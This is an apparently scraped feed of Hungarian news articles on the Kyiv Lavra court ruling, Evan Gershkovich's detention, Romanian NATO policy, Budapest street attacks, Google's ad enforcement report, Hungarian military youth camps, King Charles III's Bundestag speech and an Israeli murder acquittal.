A bíróság – amelynek rendelkezését az Ukrajinszka Pravda hírportál ismertette – elutasította a szerzeteseknek azt a kérését, hogy érvénytelenítse a műemlékegyüttes vezetősége által hozott határozatot, amelyben felbontotta az egyházzal 2013 júliusában kötött szerződést a Lavra területén lévő vallási épületek és egyéb, állami tulajdonban lévő ingatlanok ingyenes használatáról.

A bíróság a döntését indokolva kifejtette, hogy a felperes nem tudta bizonyítani vagy alátámasztani azokat az állításait, amelyek szerint az UPC-nek a Lavra területéről való „kilakoltatása” esetén fennáll a tulajdon megsemmisülésének vagy megrongálódásának, illetve harmadik fél tulajdonába, vagy használatába átadásának a veszélye, valamint azt sem, hogy sérül Ukrajna állampolgárainak a vallásszabadsághoz és a lakhatáshoz való joga.

A kulturális minisztérium döntése alapján az UPC-nek szerdán el kellett volna hagynia a Lavrát, amit nem tettek meg, csütörtökön még istentiszteletet tartottak orosz nyelven. Csütörtökön akarta ugyanis megkezdeni munkáját a barlangkolostor tulajdonában lévő ingatlanok átvételével és átadásával foglalkozó bizottság, de az UPC hívei nem engedték be a testület tagjait a Lavra területére.

The post Elutasították a kijevi Pecserszka Lavra szerzeteseinek keresetét appeared first on .

„A lehetséges legerőteljesebb módon elítéljük a Kremlnek az újságírók és a civil társadalom hangjainak megfélemlítésére, elnyomására és megbüntetésére irányuló folyamatos kísérleteit” — fogalmazott a State Department, amely arról is tájékoztatást adott, hogy állandó kapcsolatban vannak az újságíró munkaadójával, a The Wall Street Journal (WSJ) amerikai üzleti-politikai napilappal.

Az amerikai külügyi tárca közleménye egyben az Oroszországban élő vagy oda látogató amerikai állampolgárokat Oroszország azonnali elhagyására kéri az őket fenyegető orosz veszélyre hivatkozva.

Az orosz Szövetségi Biztonsági Szolgálat (FSZB) csütörtökön jelentette be, hogy kémkedés gyanújával őrizetbe vette a WSJ moszkvai tudósítóját a Moszkvától 1800 kilométerre keletre fekvő Jekatyerinburgban. Az orosz hatóságok azt állítják: Evan Gershkovich minősített információkat próbált megszerezni.

Gershkovich az első amerikai újságíró, akit a hidegháború vége óta az orosz hatóságok kémkedés miatt őrizetbe vettek. Az utolsó ilyen eset 1986-ban történt, amikor Nicholas Daniloffot, a U. S. News & World Report 52 éves moszkvai tudósítóját a KGB letartóztatta, de őt húsz nap őrizet után, fogolycsere keretében szabadon engedték.

Oroszországban a törvényhozás mindkét háza a közelmúltban arról fogadott el törvényt, hogy akár 15 év börtönt is kaphat az az újságíró, aki hamis információkat terjeszt az orosz hadseregről. A jogszabály miatt több külföldi médium – a kockázatokra hivatkozva – felfüggesztette helyszíni tudósítói tevékenységét Oroszországban.

The post Washington elítéli az újságírók megfélemlítését Oroszországban appeared first on .

Az elmúlt években a koronavírus-járvány okozta kényszerszünetet leszámítva a Liszt Ferenc nemzetközi repülőtéren rendszeresen megfordultak az Emirates légitársaság látványos dekorációval ellátott Boeing 777-esei. A 2020-as világkiállítás alkalmából felhelyezett díszítés az expó zárása után lekerült a gépekről, így Ferihegyen sem láthatjuk többé.

Amikor Dubaj számára 2013-ban odaítélték a 2020-as világkiállítás rendezésének jogát, még senki se gondolta, hogy éppen a megnyitás évében tör ki egy olyan világméretű járvány, amely számos újratervezést von maga után. Az expó szervezése közben a kellő promócióról is gondoskodtak. Reklámhordozóként az öböl menti emírséget a világ többi részével összekötő közforgalmi repülőgépek remek felületnek bizonyultak, ezért a rendezvény kiemelt partnere és hivatalos légitársasága, az 1985-ben alapított Emirates is bekapcsolódott a világkiállítás reklámozásába. Pályázatot írtak ki, hogy milyen legyen az Expo 2020 logója, mi legyen az, ami igazán felkelti a nagyközönség figyelmét. A beérkezett tizenkilencezer tervből végül egy ősi lelet inspirálta javaslatot fogadtak el.

[...] Bővebben!

A bukaresti védelmi tárca (MAPN) közleménye szerint Angel Tilvar erről tárgyalt Washingtonban, amikor amerikai partnere, Lloyd Austin fogadta őt a Pentagonban. A találkozón az Oroszországi Föderáció Ukrajna ellen indított háborújáról, a régió biztonságáról, az Egyesült Államok fegyveres erőinek jelenlétéről és a NATO védelmi és elrettentési képességének erősítésről egyeztettek a felek.

„Úgy gondoljuk, hogy sürgősen szükség van egy átfogó stratégiára a Fekete-tengerre vonatkozóan, az Egyesült Államok vezetésével, a régió kulcsszereplőinek bevonásával. Politikánkat is erősíteni fogja, ha az a NATO és az Egyesült Államok következetes és kitartó jelenlétére alapul, ha abban Amerika vezető szerepet játszik” – idézte a román védelmi miniszter Washingtonban tett kijelentését a MAPN közleménye.

Tilvar hozzátette: az Egyesült Államok tavaly már bebizonyította a Fekete-tenger térsége iránti elkötelezettségét, amikor a Romániában állomásozó csapatait a 101. Légi Szállítású Hadosztály 2. lövészdandárjának katonáival egészítette ki. A júniusi vilniusi NATO-csúcstól Románia a Fekete-tenger stratégiai jelentőségét kimondó tavalyi, madridi csúcs határozatainak gyakorlatba ültetését, és a térségbeli partnerek – Ukrajna és Moldova – támogatására irányuló döntések meghozatalát várja.

Tilvar kiemelte: washingtoni látogatására jelképes alkalommal, a Románia és az Egyesült Államok között megkötött stratégiai partnerségi megállapodás 30. évfordulójának évében került sor.

Románia az ukrajnai háború kitörését követően úgy döntött: 2023-tól kezdődően a GDP 2,5 százalékára emeli (a korábbi két százalékról) védelmi kiadásait. A román Legfelsőbb Védelmi Tanács 2017-es határozata értelmében a bukaresti védelmi minisztérium az utóbbi években több mint 10 milliárd dolláros költségvetésű haderőfejlesztésbe kezdett, amelynek során főleg amerikai gyártmányú haditechnikát – Patriot rakétaelhárító rendszereket, HIMARS sorozatvetőket és F-16-os harci repülőket – szerez be.

2025-ben újra magyar Gripenek védik a balti államok légterét
Döntés született arról, hogy Magyarország lojális NATO-szövetségesként immár negyedik alkalommal, 2025-ben ismét részt vesz a balti államok légtérvédelmében. Magyarország eddig háromszor vett részt a balti országok légterének védelmében, és a negyedik körről is döntés született. A hazánkban található közép-európai többnemzeti haderőparancsnokság elérte azt a működési szintet, amelynek nyomán hamarosan odalátogat az európai NATO-erők főparancsnoka.

The post Orosz agresszió: Románia új NATO-stratégiát sürget a Fekete-tenger térsége számára appeared first on .

A közösség tagja elleni erőszak miatt folytatott eljárásban az eddig kihallgatott négy gyanúsítotton kívül már további hat külföldi ellen van érvényben elfogatóparancs. A fővárosban február 11-e előtti napokban elkövetett támadások felderítésére a BRFK-n létrehozott nyomozócsoport folyamatosan dolgozik a bűncselekmény-sorozat felderítésén – írták.

A budapesti nyomozók szorosan együttműködnek a német rendőrséggel. Az eljárásnak négy gyanúsítottja van: egy német és egy olasz állampolgár letartóztatásban van, egy német bűnügyi felügyeletét rendelték el, egy magyar pedig szabadlábon védekezik.

Korábban a bűncselekmény-sorozattal összefüggésben a BRFK további három német állampolgár ellen adott ki elfogatóparancsot. A nemzetközi együttműködés eredményeként a pénteki közlés szerint újabb három német állampolgárral bővült az elfogatóparanccsal körözöttek köre.

A BRFK „üzenete egyértelmű: nem tűrjük, hogy akár ideológiai alapon, akár anélkül emberekre támadjanak a fővárosban. A jogszabályok által lehetővé tett valamennyi eszközt igénybe vesszük, hogy az elkövetőket állampolgárságra, ideológiára, nemre való tekintet nélkül azonosítsuk, és lefolytassuk velük szemben az eljárást” – olvasható a közleményben.

A Fővárosi Főügyészség korábbi tájékoztatása szerint a BRFK a Budapest különböző pontjain a „kitörés napja” elnevezésű rendezvény vélt résztvevői ellen a február 11-ét megelőző napokban elkövetett támadások miatt közösség tagja elleni, felfegyverkezve, csoportosan elkövetett erőszak, súlyos testi sértés és más bűncselekmények miatt nyomoz. Az elkövetők szélsőjobboldali nézetekre utaló öltözékük miatt támadták meg a számukra ismeretlen sértetteket.

Korábbi sajtótájékoztatóján a rendőrség azt közölte, hogy a teleszkópos botokkal, úgynevezett viperákkal, valamint boxerekkel és más eszközökkel végrehajtott támadásokat hét-nyolc ember követte el, de a társaságnak tíz-tizenöt tagja lehet.

A támadók előbb lengyel turistákat vertek össze – a sértettek közül ketten súlyos, töréses sérüléseket szenvedtek -, majd egy nappal később egy férfit bántalmaztak Gazdagréten, ő könnyebben sérült meg. Ezt követően a belvárosi Bank utcában egy koncertről hazainduló párt vertek össze, a férfi súlyosan megsérült, az I. kerületi Mikó utcában pedig egy német párt bántalmaztak súlyosan.

The post Újabb külföldieket keresnek a februári budapesti utcai támadások ügyében appeared first on .

A jelentés szerint a Google emellett több mint 1,5 milliárd kiadói felületen blokkolta vagy korlátozta a hirdetések megjelenését, és több mint 143 ezer kiadói oldalon hajtott végre széleskörű, teljes webhelyre vonatkozó biztonsági intézkedéseket.

Kiemelt figyelmet fordítottak tavaly a csalások elleni fellépésre. A csalások száma továbbra is folyamatosan nő. Bár az átverések nem számítanak újdonságnak a digitális hirdetések világában, valódi pénzügyi károkat okozhatnak, ezért a Google elkötelezetten küzd platformjain a különböző csalások ellen.

Tavaly a vállalat bővítette a pénzügyi szolgáltatások ellenőrzésére irányuló programját, amely megköveteli a hirdetőktől annak bizonyítását, hogy a helyi szabályozó hatóság engedélyezte számukra termékeik és szolgáltatásaik reklámozását. Ez egy újabb lépcsőfok a csalókkal szembeni biztonsági intézkedések terén, mely még hatékonyabban védi az embereket a pénzügyi csalásoktól. A Google eddig 11 országban indította el a programot, köztük az Egyesült Királyságban, Ausztráliában és Szingapúrban, 2023-ban pedig további bővítéseket tervez.

Tavaly a Google 142 millió hirdetést blokkolt vagy távolított el a megtévesztésre vonatkozó irányelv, további 198 millió hirdetést pedig a pénzügyi szolgáltatásokra irányuló irányelv megsértése miatt.

Az elmúlt években a vállalat intézkedéseket dolgozott ki a téves információk és a megbízhatatlan állítások elleni küzdelemre vonatkozóan az általános hirdetési ökoszisztémában. Ezek közé tartoznak az egészségre vonatkozó, káros és a bizonyíthatóan hamis állítások elleni irányelvek. 2022-ben több mint 300 ezer sajtókiadói oldalon tiltotta le olyan hirdetések futtatását, amelyek nem feleltek meg ezen szabályozásoknak, illetve több mint 24 millió, az irányelveket sértő hirdetést blokkolt. Továbbá több mint 51,2 millió hirdetést blokkolt és távolított el nem megfelelő tartalom miatt, beleértve a gyűlöletbeszédre és erőszakra vonatkozó, illetve egészségügyi témákra vonatkozó káros állításokat, valamint 20,6 millió veszélyes termékeket vagy szolgáltatásokat, például fegyvereket és robbanóanyagokat népszerűsítő hirdetést – közölték.

Az ukrajnai háború kitörését követően a cég megakadályozta az olyan hirdetéseket, amelyek kihasználják, tagadják vagy elnézően írnak a háborúról. Ez kiegészíti azokat a régóta érvényben lévő irányelveket, amelyek megtiltják az erőszakra uszító vagy tragikus események megtörténtét tagadó tartalmak hirdetésekként való futtatását vagy az azokhoz kapcsolódó, a Google szolgáltatásain keresztüli pénzszerzést. A Google a termékeit érintő oroszországi kereskedelmi tevékenységeinek többségét is szüneteltette.

Tavaly a vállalat több mint 17 millió, az ukrajnai háborúval kapcsolatos hirdetést blokkolt, ezen kívül pedig több mint 275 államilag finanszírozott médiakiadvány weboldaláról távolított el hirdetéseket a platformjain.

The post A Google tavaly több mint 5,2 milliárd rosszindulatú hirdetést törölt appeared first on .

Azt írták, idén júniustól augusztusig csaknem száz táborban, 135 turnusban táborozhatnak a 12 és 18 év közötti fiatalok. Idén 17 féle különböző honvédelmi témájú tematikából lehet választani az ország mintegy 59 különböző helyszínén.

A HM közleménye szerint idén is változatos programokkal várja a táborokba jelentkezőket a Magyar Honvédség, a tematikus nyári programsorozat több ezer diák számára jelent izgalmakkal és élményekkel teli, aktív nyári elfoglaltságot. Idén a hetedik alkalommal rendezi meg a Magyar Honvédség a nyári szünetben a 12-18 éves korosztálynak szóló honvédelmi táborokat.

Kiemelték: a táborokban nem katona-növendékeket nevelnek, „a résztvevőknek – azon túl, hogy jól érezzék magukat – semmi kötelezettségük nincs a sereg felé”. Ugyanakkor biztonságos körülmények között, szakemberek irányításával és felügyelete mellett, szórakoztató módon próbálhatnak ki új dolgokat, miközben megismerik saját határaikat, kilépnek a komfortzónájukból.

Mondhatni életük egyik legnagyobb kalandjában vesznek rész, miközben játszva sajátítanak el olyan képességeket és ismereteket, amiket a mindennapi élet során is hasznosítani tudnak majd – írta a tárca.

A diákok a honvédelmi táborokban a sokszínű programokon keresztül betekintést nyernek az általuk választott témakörbe, ám ami ennél fontosabb, a mindennapi gyakorlattól eltérő, szokatlan, újszerű feladatokat is biztosítanak számukra a szervezők, amelyekkel erősítik a csoporton belüli összetartozást, az egymásra figyelést, az „együtt gondolkodást”. A gyermekek közösségben vannak, kiléphetnek a szürke hétköznapokból, új barátokat szerezhetnek – sorolták.

Hangsúlyozták: a honvédelmi táborok fontos részét képezik a hazafias és honvédelmi nevelésnek, hiszen ezen keresztül a fiatalok betekintést nyerhetnek a Magyar Honvédség és a katonák mindennapjaiba. Kiemelték: a táborok sikere 2016 óta folyamatosan töretlen, a meghirdetett helyek órák, napok alatt betelnek.

The post HM: hétfőtől lehet jelentkezni a honvédelmi táborokba appeared first on .

III. Károly a háromnapos németországi látogatása legfontosabb elemeként elmondott parlamenti beszédében kiemelte, hogy a háború elképzelhetetlen szenvedést okoz ártatlan embereknek, tönkretesz számtalan életet és „brutálisan a földbe tiporja a szabadságot és az emberi méltóságot”.

A világ azonban nem nézi mindezt tétlenül, és „egységünkből erőt meríthetünk Ukrajna, a béke és a szabadság védelméhez” – mondta a király, rámutatva, hogy hazája és Németország Ukrajna legnagyobb támogatója Európában.

„Fontos vezető szerepet vállaltunk, határozottan reagáltunk és meghoztunk döntéseket, amelyek korábban talán elképzelhetetlenek lettek volna” – tette hozzá III. Károly.

Aláhúzta: „rendkívül bátor, fontos és üdvözlendő”, hogy Németország igen jelentős katonai támogatást nyújt az orosz támadás ellen védekező Ukrajnának.

III. Károly az első uralkodó, aki felszólalt a Bundestagban, azonban a csütörtöki már a második beszéde volt a német szövetségi parlamentben. Az elsőt 2020-ban, még trónörökösként tartotta, a háborúk, az önkényuralmi rendszerek és a politikai indíttatású erőszak egyéb formái halálos áldozatai emléknapjának (Volkstrauertag) fő szónokaként.

Mindkét alkalommal többnyire németül beszélt, és elsősorban az Egyesült Királyság és Németország szoros történelmi kapcsolatáról szólt. Trónörökösként és uralkodóként elmondott beszédében egyaránt elemezte a britek és németek kultúrájának egymást ösztönző és erősítő, körkörös kapcsolatát, amelynek példái közül mindkét alkalommal kiemelte, hogy William Shakespeare műveit elsőként németre fordították le.

Csütörtöki beszédben viszont a Johannes Brahms vagy éppen a Kraftwerk zenekar munkássága iránti brit elismerés és a Monty Python csoport és a Beatles körüli németországi kultusz ügye mellett a három évvel korábbinál hangsúlyosabban jelentek meg a kapcsolatok politikai vonatkozású elemei, nem csak az ukrajnai háborúval összefüggésben.

Az uralkodó így többek között rámutatott, hogy a német nép az egyetlen, amellyel a brit haderő közös alakulatot tart fenn – ez a 130. számú brit-német pontonos hidászzászlóalj -, és arról is szólt, hogy a brit és a német légierő együtt dolgozik a balti államok biztonságának megőrzéséért.

Hangsúlyozta hogy az Egyesült Királyságnak és Németországnak a jövőben is együtt kell működnie a szabadság és a demokrácia védelmében. Mint mondta, „együtt és állandó figyelemmel kell szemmel tartanunk az értékeinket és szabadságunkat fenyegető veszélyeket, és határozottan szembe kell szállnunk velük”.

„Együtt kell törekednünk arra, hogy népünk a megérdemelt biztonságban és jólétben éljen” – mondta III. Károly, akinek beszédét a Bundestag elnöke és legtöbb képviselője mellett a kancellár, az alkotmánybíróság elnöke és egy sor magas rangú vendég is meghallgatta.

III. Károly meghívását a parlamenti pártok közül egyedül a kormányzó szociáldemokratáktól (SPD) balra álló ellenzéki Baloldal (Die Linke) ellenezte. Álláspontjuk szerint méltatlan a Bundestaghoz, hogy „meghajol egy uralkodó előtt”, és a „monarchiák amúgy is lényegében diktatúrák, csak több történelmi díszlettel”.

III. Károly szerdán érkezett Berlinbe királynői rangú hitvesével, Kamillával. Ez a tavaly trónra lépett uralkodó első állami látogatása. Az eredeti tervek szerint Franciaországot kereste fel volna elsőként. A németországi út előtti napokra tervezett vizitet Emmanuel Macron francia államfő kérésére elhalasztották.

The post III. Károly: az Ukrajna elleni támadás veszélyezteti Európa biztonságát appeared first on .

Az ítélet – amelyről a katonai rádió számolt be csütörtökön – két bíró többségi véleménye alapján született egy, a vádat továbbra is fenntartó bírónővel szemben. Az orosz származású Roman Zadorovot tizenhét évvel azután mentették fel, hogy a 14 éves Tair Radát brutálisan meggyilkolták egy iskola mellékhelyiségében.

A bírók többsége szerint Zadorov bűnösségét nem igazolták a lány megölésének helyszínén talált bűnjelek, vallomását pedig pszichológiai nyomás és a rendőrség manipulációjának hatására tette. A vádlott bűnösségét igazoló legfőbb bizonyíték a beismerő vallomása volt, amelyet azonban gyorsan visszavont. Az újonnan közzétett szakértői vélemények és a helyszínen talált nyomok miatt a legfelsőbb bíróság másfél évvel ezelőtt rendelte el a per újratárgyalását. Azóta Zadorov házi őrizetben élt.

Tair Radát 2006. december 6-án ölték meg számos késszúrással a Golán-fennsíkon található Kacrín város iskolájában. Az akkor 44 éves Zadorovot, aki ekkor az iskola karbantartójaként dolgozott, négy nappal a gyilkosság után vették őrizetbe. A férfi néhány nappal később beismerő vallomást tett, majd a helyszínen is bemutatta a történteket, ám több „hibát” is ejtett, például nem tudta, hogy az illemhely melyik fülkéjében került sor a gyilkosságra. Egy nappal később ügyvédet váltott, és visszavonta vallomását.

Zadorovot végül hosszú és vitatott, csak 2010-ben lezárult tárgyalás után ítélték el, melyben sokan, köztük a megölt lány édesanyja is megkérdőjelezték vétkességét, s úgy vélték, a rendőrség és az ügyészség faragott belőle bűnöst. A gyilkosság, valamint Zadorov esetleges ártatlansága az utóbbi évtizedben visszatérő kérdés volt Izraelben, az ügyről több dokumentumfilm is készült.

The post Tizenöt évet ülhetett ártatlanul appeared first on .